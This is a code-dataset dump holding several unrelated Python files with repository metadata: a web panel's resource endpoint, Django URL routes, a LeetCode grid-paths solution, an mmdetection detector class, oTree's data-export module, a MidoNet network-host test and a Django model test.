for resource in self.mgr[plugin]['info']['resources']:
if resource.startswith('ng:'):
ng_modules.append(resource.split(':')[-1])
content = '''
window.__ngModules = %s;
''' % json.dumps(ng_modules)
if type == 'partials.js':
content = '''
angular.module("core.templates", []);
angular.module("core.templates").run(
["$templateCache", function($templateCache) {
'''
for plugin in self.mgr:
for resource in self.mgr[plugin]['info']['resources']:
if resource.endswith('.html'):
path = self.mgr.get_content_path(plugin, resource)
if os.path.exists(path):
template = open(path).read()
content += '''
$templateCache.put("%s", %s);
''' % (
'%s/%s:%s' % (http_context.prefix, plugin, resource),
json.dumps(template)
)
content += '''
}]);
'''
self.cache[type] = content
http_context.add_header('Content-Type', {
'css': 'text/css',
'js': 'application/javascript; charset=utf-8',
'init.js': 'application/javascript; charset=utf-8',
'partials.js': 'application/javascript; charset=utf-8',
}[type])
http_context.respond_ok()
return http_context.gzip(content=content)
@url(r'/resources/(?P<plugin>\w+)/(?P<path>.+)')
@endpoint(page=True, auth=False)
def handle_file(self, http_context, plugin=None, path=None):
if '..' in path:
return http_context.respond_not_found()
return http_context.file(PluginManager.get(aj.context).get_content_path(plugin, path))
| [
"[email protected]"
] | |
44375c66e34b3f92833d4072fa8cc571efb27d5b | 163872dee6c98ab2d4f9f592509050fda2e1abc6 | /myapp_1/urls.py | 2d7b659af0d5a416f915a80c5a73296ffccccec7 | [] | no_license | aynulislam/Django-Rest-Framework | b89b3cab93254aefa7b53c85ba384f911b2516e0 | 6f9e1cffc651b4e809aa6fbfff0e12a66cdbb989 | refs/heads/master | 2020-08-15T07:24:15.812020 | 2019-10-16T09:09:00 | 2019-10-16T09:09:00 | 215,300,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | from django.urls import path
from . views import EmCategoryAPIView,EmEmailAPIView,EmReceiverAPIView,EmGroupAPIView,EmUserAPIView,ScUserAPIView,GnGroupTypeAPIView
urlpatterns = [
path('EmCategory/', EmCategoryAPIView, name="EmCategoryAPIView"),
path('EmEmail/', EmEmailAPIView, name="EmEmailAPIView"),
path('EmReceiver/', EmReceiverAPIView, name="EmReceiverAPIView"),
path('EmGroup/', EmGroupAPIView, name="EmGroupAPIView"),
path('EmUser/', EmUserAPIView, name="EmUserAPIView"),
path('ScUser/', ScUserAPIView, name="ScUserAPIView"),
path('GnGroup/', GnGroupTypeAPIView, name="GnGroupTypeAPIView"),
]
| [
"[email protected]"
] | |
468b66b2fef16af97cf3104bbb05e66e47e4bff1 | f9e8733ed87858b12bfee6b70ccdddd6a616b60a | /62.py | 799f209d8c36c80090880a57df0cc0ad6e89c666 | [] | no_license | MajestyLee/leetcode_TopInterview | c1c9c923d3bf42cd4777bb2a2ccd21654a7c6dbb | 30b7d5acec716b7d754141835fc8bafe4411437e | refs/heads/master | 2020-04-01T12:19:20.837383 | 2018-11-06T02:13:44 | 2018-11-06T02:13:44 | 153,200,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,353 | py | '''
A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).
The robot can only move either down or right at any point in time.
The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).
How many possible unique paths are there?
Above is a 7 x 3 grid. How many possible unique paths are there?
Note: m and n will be at most 100.
Example 1:
Input: m = 3, n = 2
Output: 3
Explanation:
From the top-left corner, there are a total of 3 ways to reach the bottom-right corner:
1. Right -> Right -> Down
2. Right -> Down -> Right
3. Down -> Right -> Right
Example 2:
Input: m = 7, n = 3
Output: 28
'''
#DP
import math
class Solution:
def uniquePaths(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
"""
dp = [[1 for j in range(0,m)] for i in range(0,n)]
for i in range(1,n):
for j in range(1,m):
dp[i][j] = dp[i-1][j] + dp[i][j-1]
return dp[-1][-1]
#dfs
def dfsUniquePaths(self,m,n):
if m==1 or n == 1:
return 1
else:
return self.uniquePaths(m - 1, n) + self.uniquePaths(m, n - 1)
#math
def mathUniquePaths(self, m, n):
return math.factorial(m+n-2)/math.factorial(m-1)/math.factorial(n-1)
| [
"[email protected]"
] | |
d1509126fa63efd3f64b1929998f2ca8f07320df | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/detection/NasFPN/mmdet/models/detectors/trident_faster_rcnn.py | f0fd80d41407162df71ba5349fc659d4713cdb6e | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 2,662 | py | from ..builder import DETECTORS
from .faster_rcnn import FasterRCNN
@DETECTORS.register_module()
class TridentFasterRCNN(FasterRCNN):
"""Implementation of `TridentNet <https://arxiv.org/abs/1901.01892>`_"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None):
super(TridentFasterRCNN, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
assert self.backbone.num_branch == self.roi_head.num_branch
assert self.backbone.test_branch_idx == self.roi_head.test_branch_idx
self.num_branch = self.backbone.num_branch
self.test_branch_idx = self.backbone.test_branch_idx
def simple_test(self, img, img_metas, proposals=None, rescale=False):
"""Test without augmentation."""
assert self.with_bbox, 'Bbox head must be implemented.'
x = self.extract_feat(img)
if proposals is None:
num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
trident_img_metas = img_metas * num_branch
proposal_list = self.rpn_head.simple_test_rpn(x, trident_img_metas)
else:
proposal_list = proposals
return self.roi_head.simple_test(
x, proposal_list, trident_img_metas, rescale=rescale)
def aug_test(self, imgs, img_metas, rescale=False):
"""Test with augmentations.
If rescale is False, then returned bboxes and masks will fit the scale
of imgs[0].
"""
x = self.extract_feats(imgs)
num_branch = (self.num_branch if self.test_branch_idx == -1 else 1)
trident_img_metas = [img_metas * num_branch for img_metas in img_metas]
proposal_list = self.rpn_head.aug_test_rpn(x, trident_img_metas)
return self.roi_head.aug_test(
x, proposal_list, img_metas, rescale=rescale)
def forward_train(self, img, img_metas, gt_bboxes, gt_labels, **kwargs):
"""make copies of img and gts to fit multi-branch."""
trident_gt_bboxes = tuple(gt_bboxes * self.num_branch)
trident_gt_labels = tuple(gt_labels * self.num_branch)
trident_img_metas = tuple(img_metas * self.num_branch)
return super(TridentFasterRCNN,
self).forward_train(img, trident_img_metas,
trident_gt_bboxes, trident_gt_labels)
| [
"[email protected]"
] | |
894b209cab8c7b9927d6ddd95fe0b0e53161b536 | 1745b353ca80b37d649197bb8fd8025429f01819 | /otree/export.py | 2674004d4cd14b66dae2d96ebca4ae0cf8e47af3 | [
"MIT"
] | permissive | MetaCell/otree-core | 9cd0041f1aa2023a4039e2f091faafa0208d7e58 | 638af2f8fc434700373366b2bb9018f2c2f41840 | refs/heads/master | 2021-01-12T14:06:31.253436 | 2016-09-26T10:43:02 | 2016-09-26T10:43:02 | 69,562,622 | 0 | 0 | null | 2018-04-24T10:07:08 | 2016-09-29T11:50:19 | Python | UTF-8 | Python | false | false | 19,090 | py | from __future__ import absolute_import
from otree.common import Currency
from django.db.models import BinaryField
import sys
import datetime
import inspect
import otree
import collections
import six
from django.utils.encoding import force_text
from collections import OrderedDict
from django.conf import settings
from django.db.models import Max, Count, Sum
from decimal import Decimal
import otree.constants_internal
from otree.models.participant import Participant
from otree.models.session import Session
from otree.models.subsession import BaseSubsession
from otree.models.group import BaseGroup
from otree.models.player import BasePlayer
from otree.models_concrete import (
PageCompletion)
from otree.common_internal import get_models_module, app_name_format
if sys.version_info[0] == 2:
import unicodecsv as csv
else:
import csv
def inspect_field_names(Model):
# filter out BinaryField, because it's not useful for CSV export or
# live results. could be very big, and causes problems with utf-8 export
# I tried .get_fields() instead of .fields, but that method returns
# fields that cause problems, like saying group has an attribute 'player'
return [f.name for f in Model._meta.fields
if not isinstance(f, BinaryField)]
def get_field_names_for_live_update(Model):
return _get_table_fields(Model, for_export=False)
def get_field_names_for_csv(Model):
return _get_table_fields(Model, for_export=True)
def _get_table_fields(Model, for_export=False):
if Model is Session:
# only data export
return [
'code',
'label',
'experimenter_name',
# not a field
#'real_world_currency_per_point',
'time_scheduled',
'time_started',
'mturk_HITId',
'mturk_HITGroupId',
# not a field
#'participation_fee',
'comment',
'is_demo',
]
if Model is Participant:
if for_export:
return [
'id_in_session',
'code',
'label',
'_is_bot',
'_index_in_pages',
'_max_page_index',
'_current_app_name',
'_round_number',
'_current_page_name',
'ip_address',
'time_started',
'exclude_from_data_analysis',
'visited',
'mturk_worker_id',
'mturk_assignment_id',
]
else:
return [
'_id_in_session',
'code',
'label',
'_current_page',
'_current_app_name',
'_round_number',
'_current_page_name',
'status',
'_last_page_timestamp',
]
if issubclass(Model, BasePlayer):
subclass_fields = [
f for f in inspect_field_names(Model)
if f not in inspect_field_names(BasePlayer)
and f not in ['id', 'group', 'subsession']
]
if for_export:
return ['id_in_group'] + subclass_fields + ['payoff']
else:
return ['id_in_group', 'role'] + subclass_fields + ['payoff']
if issubclass(Model, BaseGroup):
subclass_fields = [
f for f in inspect_field_names(Model)
if f not in inspect_field_names(BaseGroup)
and f not in ['id', 'subsession']
]
return ['id_in_subsession'] + subclass_fields
if issubclass(Model, BaseSubsession):
subclass_fields = [
f for f in inspect_field_names(Model)
if f not in inspect_field_names(BaseGroup)
and f != 'id'
]
return ['round_number'] + subclass_fields
def sanitize_for_csv(value):
if value is None:
return ''
if value is True:
return '1'
if value is False:
return '0'
value = force_text(value)
return value.replace('\n', ' ').replace('\r', ' ')
def sanitize_for_live_update(value):
if value is None:
return ''
if value is True:
return 1
if value is False:
return 0
return value
def get_rows_for_wide_csv():
sessions = Session.objects.order_by('id').annotate(
num_participants=Count('participant')).values()
session_cache = {row['id']: row for row in sessions}
participants = Participant.objects.order_by('id').values()
payoff_cache = get_payoff_cache()
payoff_plus_participation_fee_cache = get_payoff_plus_participation_fee_cache(payoff_cache)
session_fields = get_field_names_for_csv(Session)
participant_fields = get_field_names_for_csv(Participant)
participant_fields += ['payoff', 'payoff_plus_participation_fee']
header_row = ['participant.{}'.format(fname) for fname in participant_fields]
header_row += ['session.{}'.format(fname) for fname in session_fields]
rows = [header_row]
for participant in participants:
participant['payoff'] = payoff_cache[participant['id']]
participant['payoff_plus_participation_fee'] = payoff_plus_participation_fee_cache[participant['id']]
row = [sanitize_for_csv(participant[fname]) for fname in participant_fields]
session = session_cache[participant['session_id']]
row += [sanitize_for_csv(session[fname]) for fname in session_fields]
rows.append(row)
# heuristic to get the most relevant order of apps
import json
app_sequences = collections.Counter()
for session in sessions:
config = json.loads(session['config'])
app_sequence = config['app_sequence']
app_sequences[tuple(app_sequence)] += session['num_participants']
most_common_app_sequence = app_sequences.most_common(1)[0][0]
apps_not_in_popular_sequence = [
app for app in settings.INSTALLED_OTREE_APPS
if app not in most_common_app_sequence]
order_of_apps = list(most_common_app_sequence) + apps_not_in_popular_sequence
rounds_per_app = OrderedDict()
for app_name in order_of_apps:
models_module = get_models_module(app_name)
agg_dict = models_module.Subsession.objects.all().aggregate(Max('round_number'))
highest_round_number = agg_dict['round_number__max']
if highest_round_number is not None:
rounds_per_app[app_name] = highest_round_number
for app_name in rounds_per_app:
for round_number in range(1, rounds_per_app[app_name] + 1):
new_rows = get_rows_for_wide_csv_round(app_name, round_number, sessions)
for i in range(len(rows)):
rows[i].extend(new_rows[i])
return rows
def get_rows_for_wide_csv_round(app_name, round_number, sessions):
models_module = otree.common_internal.get_models_module(app_name)
Player = models_module.Player
Group = models_module.Group
Subsession = models_module.Subsession
rows = []
group_cache = {row['id']: row for row in Group.objects.values()}
columns_for_models = {
Model.__name__.lower(): get_field_names_for_csv(Model)
for Model in [Player, Group, Subsession]
}
model_order = ['player', 'group', 'subsession']
header_row = []
for model_name in model_order:
for colname in columns_for_models[model_name]:
header_row.append('{}.{}.{}.{}'.format(
app_name, round_number, model_name, colname))
rows.append(header_row)
empty_row = ['' for _ in range(len(header_row))]
for session in sessions:
subsession = Subsession.objects.filter(
session_id=session['id'], round_number=round_number).values()
if not subsession:
subsession_rows = [empty_row for _ in range(session['num_participants'])]
else:
subsession = subsession[0]
subsession_id = subsession['id']
players = Player.objects.filter(subsession_id=subsession_id).order_by('id').values()
subsession_rows = []
for player in players:
row = []
all_objects = {
'player': player,
'group': group_cache[player['group_id']],
'subsession': subsession}
for model_name in model_order:
for colname in columns_for_models[model_name]:
value = all_objects[model_name][colname]
row.append(sanitize_for_csv(value))
subsession_rows.append(row)
rows.extend(subsession_rows)
return rows
def get_rows_for_csv(app_name):
models_module = otree.common_internal.get_models_module(app_name)
Player = models_module.Player
Group = models_module.Group
Subsession = models_module.Subsession
columns_for_models = {
Model.__name__.lower(): get_field_names_for_csv(Model)
for Model in [Player, Group, Subsession, Participant, Session]
}
participant_ids = Player.objects.values_list('participant_id', flat=True)
session_ids = Subsession.objects.values_list('session_id', flat=True)
players = Player.objects.order_by('id').values()
value_dicts = {
'group': {row['id']: row for row in Group.objects.values()},
'subsession': {row['id']: row for row in Subsession.objects.values()},
'participant': {row['id']: row for row in
Participant.objects.filter(
id__in=participant_ids).values()},
'session': {row['id']: row for row in
Session.objects.filter(id__in=session_ids).values()}
}
model_order = ['participant', 'player', 'group', 'subsession', 'session']
# header row
rows = [['{}.{}'.format(model_name, colname)
for model_name in model_order
for colname in columns_for_models[model_name]]]
for player in players:
row = []
all_objects = {'player': player}
for model_name in value_dicts:
obj_id = player['{}_id'.format(model_name)]
all_objects[model_name] = value_dicts[model_name][obj_id]
for model_name in model_order:
for colname in columns_for_models[model_name]:
value = all_objects[model_name][colname]
row.append(sanitize_for_csv(value))
rows.append(row)
return rows
def get_rows_for_live_update(app_name, subsession_pk):
models_module = otree.common_internal.get_models_module(app_name)
Player = models_module.Player
Group = models_module.Group
Subsession = models_module.Subsession
columns_for_models = {
Model.__name__.lower(): get_field_names_for_live_update(Model)
for Model in [Player, Group, Subsession]
}
# we had a strange result on one person's heroku instance
# where Meta.ordering on the Player was being ingnored
# when you use a filter. So we add one explicitly.
players = Player.objects.filter(
subsession_id=subsession_pk).select_related(
'group', 'subsession').order_by('pk')
model_order = ['player', 'group', 'subsession']
rows = []
for player in players:
row = []
for model_name in model_order:
if model_name == 'player':
model_instance = player
else:
model_instance = getattr(player, model_name)
for colname in columns_for_models[model_name]:
attr = getattr(model_instance, colname, '')
if isinstance(attr, collections.Callable):
if model_name == 'player' and colname == 'role' \
and model_instance.group is None:
attr = ''
else:
try:
attr = attr()
except:
attr = "(error)"
row.append(sanitize_for_live_update(attr))
rows.append(row)
return columns_for_models, rows
def export_wide(fp, file_extension='csv'):
rows = get_rows_for_wide_csv()
if file_extension == 'xlsx':
_export_xlsx(fp, rows)
else:
_export_csv(fp, rows)
def export_app(app_name, fp, file_extension='csv'):
rows = get_rows_for_csv(app_name)
if file_extension == 'xlsx':
_export_xlsx(fp, rows)
else:
_export_csv(fp, rows)
def _export_csv(fp, rows):
writer = csv.writer(fp)
writer.writerows(rows)
def _export_xlsx(fp, rows):
'''
CSV often does not open properly in Excel, e.g. unicode
'''
import xlsxwriter
workbook = xlsxwriter.Workbook(fp, {'in_memory': True})
worksheet = workbook.add_worksheet()
for row_num, row in enumerate(rows):
for col_num, cell_value in enumerate(row):
worksheet.write(row_num, col_num, cell_value)
workbook.close()
def export_time_spent(fp):
"""Write the data of the timespent on each_page as csv into the file-like
object
"""
column_names = [
'session_id',
'participant__id_in_session',
'participant__code',
'page_index',
'app_name',
'page_name',
'time_stamp',
'seconds_on_page',
'subsession_pk',
'auto_submitted',
]
rows = PageCompletion.objects.order_by(
'session', 'participant', 'page_index'
).values_list(*column_names)
writer = csv.writer(fp)
writer.writerows([column_names])
writer.writerows(rows)
def export_docs(fp, app_name):
"""Write the dcos of the given app name as csv into the file-like object
"""
# generate doct_dict
models_module = get_models_module(app_name)
model_names = ["Participant", "Player", "Group", "Subsession", "Session"]
line_break = '\r\n'
def choices_readable(choices):
lines = []
for value, name in choices:
# unicode() call is for lazy translation strings
lines.append(u'{}: {}'.format(value, six.text_type(name)))
return lines
def generate_doc_dict():
doc_dict = OrderedDict()
data_types_readable = {
'PositiveIntegerField': 'positive integer',
'IntegerField': 'integer',
'BooleanField': 'boolean',
'CharField': 'text',
'TextField': 'text',
'FloatField': 'decimal',
'DecimalField': 'decimal',
'CurrencyField': 'currency'}
for model_name in model_names:
if model_name == 'Participant':
Model = Participant
elif model_name == 'Session':
Model = Session
else:
Model = getattr(models_module, model_name)
field_names = set(field.name for field in Model._meta.fields)
members = get_field_names_for_csv(Model)
doc_dict[model_name] = OrderedDict()
for member_name in members:
member = getattr(Model, member_name, None)
doc_dict[model_name][member_name] = OrderedDict()
if member_name == 'id':
doc_dict[model_name][member_name]['type'] = [
'positive integer']
doc_dict[model_name][member_name]['doc'] = ['Unique ID']
elif member_name in field_names:
member = Model._meta.get_field_by_name(member_name)[0]
internal_type = member.get_internal_type()
data_type = data_types_readable.get(
internal_type, internal_type)
doc_dict[model_name][member_name]['type'] = [data_type]
# flag error if the model doesn't have a doc attribute,
# which it should unless the field is a 3rd party field
doc = getattr(member, 'doc', '[error]') or ''
doc_dict[model_name][member_name]['doc'] = [
line.strip() for line in doc.splitlines()
if line.strip()]
choices = getattr(member, 'choices', None)
if choices:
doc_dict[model_name][member_name]['choices'] = (
choices_readable(choices))
elif isinstance(member, collections.Callable):
doc_dict[model_name][member_name]['doc'] = [
inspect.getdoc(member)]
return doc_dict
def docs_as_string(doc_dict):
first_line = '{}: Documentation'.format(app_name_format(app_name))
second_line = '*' * len(first_line)
lines = [
first_line, second_line, '',
'Accessed: {}'.format(datetime.date.today().isoformat()), '']
app_doc = getattr(models_module, 'doc', '')
if app_doc:
lines += [app_doc, '']
for model_name in doc_dict:
lines.append(model_name)
for member in doc_dict[model_name]:
lines.append('\t{}'.format(member))
for info_type in doc_dict[model_name][member]:
lines.append('\t\t{}'.format(info_type))
for info_line in doc_dict[model_name][member][info_type]:
lines.append(u'{}{}'.format('\t' * 3, info_line))
output = u'\n'.join(lines)
return output.replace('\n', line_break).replace('\t', ' ')
doc_dict = generate_doc_dict()
doc = docs_as_string(doc_dict)
fp.write(doc)
def get_payoff_cache():
payoff_cache = collections.defaultdict(Decimal)
for app_name in settings.INSTALLED_OTREE_APPS:
models_module = get_models_module(app_name)
Player = models_module.Player
for d in Player.objects.values(
'participant_id', 'session_id').annotate(Sum('payoff')):
payoff_cache[d['participant_id']] += (d['payoff__sum'] or 0)
return payoff_cache
def get_payoff_plus_participation_fee_cache(payoff_cache):
# don't want to modify the input
payoff_cache = payoff_cache.copy()
for p_id in payoff_cache:
# convert to Currency so we can call to_real_world_currency
payoff_cache[p_id] = Currency(payoff_cache[p_id])
participant_ids_to_session_ids = {
p['id']: p['session_id'] for p in Participant.objects.values(
'id', 'session_id')
}
sessions_cache = {s.id: s for s in Session.objects.all()}
payoff_plus_participation_fee_cache = collections.defaultdict(Decimal)
for p_id in payoff_cache:
session_id = participant_ids_to_session_ids[p_id]
session = sessions_cache[session_id]
payoff = payoff_cache[p_id]
payoff_plus_participation_fee = session._get_payoff_plus_participation_fee(payoff)
payoff_plus_participation_fee_cache[p_id] = payoff_plus_participation_fee.to_number()
return payoff_plus_participation_fee_cache
| [
"[email protected]"
] | |
f82e5bb5a7ab5e8c5feeaf09b0b27b2a68ca3543 | c361a25acecd016677bbd0c6d9fc56de79cf03ed | /PTM/tests/NetworkHostTest.py | 24465c10617c8bc706896eaea73a686ec4fea431 | [] | no_license | danielmellado/zephyr | f8931633045959e7e9a974de8b700a287a1ae94e | dc6f85b78b50e599504966154b927fe198d7402d | refs/heads/master | 2021-01-12T22:31:24.479814 | 2015-10-14T05:39:04 | 2015-10-14T06:24:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,468 | py | __author__ = 'micucci'
import unittest
import json
import time
import os
from common.CLI import LinuxCLI
from PTM.ComputeHost import ComputeHost
from PTM.CassandraHost import CassandraHost
from PTM.ZookeeperHost import ZookeeperHost
from PTM.NetworkHost import NetworkHost
from PTM.RootHost import RootHost
from PTM.PhysicalTopologyManager import PhysicalTopologyManager, HOST_CONTROL_CMD_NAME
from PTM.PhysicalTopologyConfig import *
from common.LogManager import LogManager
import CBT.VersionConfig as version_config
class NetworkHostTest(unittest.TestCase):
def test_startup(self):
lm = LogManager('./test-logs')
ptm = PhysicalTopologyManager(root_dir=os.path.dirname(os.path.abspath(__file__)) + '/../..', log_manager=lm)
root_cfg = HostDef('root',
bridges={'br0': BridgeDef('br0', ip_addresses=[IP('10.0.0.240')])},
interfaces={'zoo1eth0': InterfaceDef('zoo1eth0', linked_bridge='br0'),
#'cass1eth0': InterfaceDef('cass1eth0', linked_bridge='br0'),
'cmp1eth0': InterfaceDef('cmp1eth0', linked_bridge='br0')})
zoo1_cfg = HostDef('zoo1',
interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.2')])})
#cass1_cfg = HostDef('cass1',
# interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.5')])})
cmp1_cfg = HostDef('cmp1',
interfaces={'eth0': InterfaceDef('eth0', ip_addresses=[IP('10.0.0.8')])})
net_cfg = HostDef('net')
zoo1_icfg= ImplementationDef('zoo1', 'PTM.ZookeeperHost', id='1',
zookeeper_ips=['10.0.0.2'])
#cass1_icfg= ImplementationDef('cass1', 'PTM.CassandraHost', id='1',
# cassandra_ips=['10.0.0.5'],
# init_token="56713727820156410577229101238628035242")
cmp1_icfg= ImplementationDef('cmp1', 'PTM.ComputeHost', id='1',
zookeeper_ips=['10.0.0.2'],
cassandra_ips=[])#['10.0.0.5'])
root_icfg = ImplementationDef('cmp1', 'PTM.RootHost')
net_icfg = ImplementationDef('cmp1', 'PTM.NetworkHost',
zookeeper_ips=['10.0.0.2'])
root = RootHost('root', ptm)
zoo1 = ZookeeperHost(zoo1_cfg.name, ptm)
#cass1 = CassandraHost(cass1_cfg.name, ptm)
cmp1 = ComputeHost(cmp1_cfg.name, ptm)
net = NetworkHost(net_cfg.name, ptm)
log = lm.add_file_logger('test.log', 'test')
root.set_logger(log)
zoo1.set_logger(log)
#cass1.set_logger(log)
cmp1.set_logger(log)
net.set_logger(log)
# Now configure the host with the definition and impl configs
root.config_from_ptc_def(root_cfg, root_icfg)
zoo1.config_from_ptc_def(zoo1_cfg, zoo1_icfg)
#cass1.config_from_ptc_def(cass1_cfg, cass1_icfg)
cmp1.config_from_ptc_def(cmp1_cfg, cmp1_icfg)
net.config_from_ptc_def(net_cfg, net_icfg)
root.link_interface(root.interfaces['zoo1eth0'], zoo1, zoo1.interfaces['eth0'])
#root.link_interface(root.interfaces['cass1eth0'], cass1, cass1.interfaces['eth0'])
root.link_interface(root.interfaces['cmp1eth0'], cmp1, cmp1.interfaces['eth0'])
ptm.hosts_by_name['root'] = root
ptm.hosts_by_name['zoo1'] = zoo1
#ptm.hosts_by_name['cass1'] = cass1
ptm.hosts_by_name['cmp1'] = cmp1
ptm.hosts_by_name['net'] = net
ptm.host_by_start_order.append(root)
ptm.host_by_start_order.append(zoo1)
#ptm.host_by_start_order.append(cass1)
ptm.host_by_start_order.append(cmp1)
ptm.host_by_start_order.append(net)
for h in ptm.host_by_start_order:
h.create()
for h in ptm.host_by_start_order:
h.boot()
for h in ptm.host_by_start_order:
h.net_up()
for h in ptm.host_by_start_order:
h.net_finalize()
for h in ptm.host_by_start_order:
h.prepare_config()
for h in ptm.host_by_start_order:
start_process = ptm.unshare_control('start', h)
stdout, stderr = start_process.communicate()
start_process.poll()
print("Host control process output: ")
print stdout
print("Host control process error output: ")
print stderr
if start_process.returncode != 0:
raise SubprocessFailedException('Host control start failed with: ' + str(start_process.returncode))
try:
h.wait_for_process_start()
except SubprocessFailedException:
raw_input("Press Enter to continue...")
self.assertTrue(LinuxCLI().cmd('midonet-cli --midonet-url="' +
version_config.ConfigMap.get_configured_parameter('param_midonet_api_url') +
'" -A -e "host list"', return_status=True) == 0)
for h in reversed(ptm.host_by_start_order):
stop_process = ptm.unshare_control('stop', h)
stdout, stderr = stop_process.communicate()
stop_process.poll()
print("Host control process output: ")
print stdout
print("Host control process error output: ")
print stderr
if stop_process.returncode != 0:
raise SubprocessFailedException('Host control stop failed with: ' + str(stop_process.returncode))
h.wait_for_process_stop()
time.sleep(1)
self.assertFalse(LinuxCLI().cmd('midonet-cli '
'--midonet-url="http://localhost:8080/midonet-api/" '
'-A -e "hosts list"',
return_status=True) == 0)
for h in reversed(ptm.host_by_start_order):
h.net_down()
for h in reversed(ptm.host_by_start_order):
h.shutdown()
for h in reversed(ptm.host_by_start_order):
h.remove()
def tearDown(self):
pass
LinuxCLI().cmd('ip netns del cmp1')
#LinuxCLI().cmd('ip netns del cass1')
LinuxCLI().cmd('ip netns del zoo1')
LinuxCLI().cmd('ip l del cmp1eth0')
#LinuxCLI().cmd('ip l del cass1eth0')
LinuxCLI().cmd('ip l del zoo1eth0')
LinuxCLI().cmd('ip l set br0 down')
LinuxCLI().cmd('brctl delbr br0')
#if LinuxCLI().exists('/var/run/cassandra.1/cassandra.pid'):
# pid = LinuxCLI().read_from_file('/var/run/cassandra.1/cassandra.pid')
# LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/zookeeper.1/pid'):
pid = LinuxCLI().read_from_file('/var/run/zookeeper.1/pid')
LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/midolman.1/pid'):
pid = LinuxCLI().read_from_file('/var/run/midolman.1/pid')
LinuxCLI().cmd('kill ' + str(pid))
if LinuxCLI().exists('/var/run/midolman.1/dnsmasq.pid'):
pid = LinuxCLI().read_from_file('/var/run/midolman.1/dnsmasq.pid')
LinuxCLI().cmd('kill ' + str(pid))
from CBT.UnitTestRunner import run_unit_test
run_unit_test(NetworkHostTest)
| [
"[email protected]"
] | |
3d735ddb0894f281dd2e222048f3bd7dd290a95f | b4aaa26889f1c7e33a0de48848e30c0119284f14 | /app/tests/test_models/test_profile_parameter.py | 66cd0693d43123ad20ed3529f566cc95d37a6c98 | [] | no_license | paulosjd/btk2 | 1d727f360c9767add5135988c75df63e5d8ada8e | dc63b90a796750e6b26018443d2256fcc1339afb | refs/heads/master | 2022-07-05T13:57:07.071734 | 2020-05-19T08:23:14 | 2020-05-19T08:23:14 | 188,910,952 | 0 | 0 | null | 2022-06-21T23:23:37 | 2019-05-27T21:26:02 | Python | UTF-8 | Python | false | false | 3,111 | py | from collections import namedtuple
from unittest.mock import patch
from app.models import ProfileParamUnitOption
from app.tests.base import BaseTestCase
mock_ideals_data = {k: f'{k}_val' for k in
['ideal2_prepend', 'ideal', 'ideal2', 'ideal_prepend']}
class MockCalcParamIdeal:
def __init__(self, *args):
self.required_field = 'abc'
self.misc_data = 'def'
self.get_ideal_data = lambda: mock_ideals_data
self.get = lambda key, default: mock_ideals_data.get(key, default)
class ProfileParameterTestCase(BaseTestCase):
@classmethod
def setUpClass(cls):
super(ProfileParameterTestCase, cls).setUpClass()
cls.profile_param_unit_opt = cls.profile_1.profile_parameters.first()
cls.profile_param_unit_opt.target_value = 34.5
cls.profile_param_unit_opt.linked_parameter = cls.param2
cls.profile_param_unit_opt.save()
@patch('app.models.profile_parameter.CalcParamIdeal')
def test_targets_method(self, cpi_patch):
nt_fields = ['saved', 'saved2', 'misc_data', 'required_field', 'ideal',
'ideal2', 'ideal_prepend', 'ideal2_prepend']
cpi_patch.return_value = MockCalcParamIdeal()
ExpectedTargetData = namedtuple('target_data', nt_fields)
expected_nt_returned = ExpectedTargetData(
self.profile_param_unit_opt.target_value,
self.profile_param_unit_opt.target_value2,
cpi_patch.return_value.misc_data,
cpi_patch.return_value.required_field,
*[mock_ideals_data.get(k, '') for k in nt_fields[-4:]]
)
self.assertEqual(expected_nt_returned,
self.profile_param_unit_opt.targets('lat_val_1'))
def test_get_unit_info_falsey(self):
TestObj = namedtuple('test_obj', 'pp_unit_option')
test_obj = TestObj(None)
self.assertIsNone(ProfileParamUnitOption.get_unit_info(test_obj))
def test_get_unit_info(self):
TestObj = namedtuple('test_obj', ['pp_unit_option', 'param_name'])
model = self.profile_param_unit_opt
model.color_hex = 'blue'
for a, b in [(5, '1'), (6, '2')]:
setattr(model, f'color_range_val_{b}', a)
test_obj = TestObj(model, 'p_name')
expected_output = {
k: getattr(test_obj.pp_unit_option.unit_option, k)
for k in ['param_default', 'conversion_factor', 'symbol']
}
expected_output.update({'color_hex': 'blue', 'color_range_val_1': 5,
'color_range_val_2': 6, 'param_name': 'p_name'})
self.assertEqual(expected_output,
ProfileParamUnitOption.get_unit_info(test_obj))
def test_param_unit_opt_dct(self):
fields = ['symbol', 'name', 'param_default', 'conversion_factor']
TestObj = namedtuple('test_obj', fields)
test_obj = TestObj(*[f'{s}_val' for s in fields])
self.assertEqual(
{f'unit_{s}': getattr(test_obj, s) for s in fields},
ProfileParamUnitOption.param_unit_opt_dct(test_obj)
)
| [
"[email protected]"
] | |
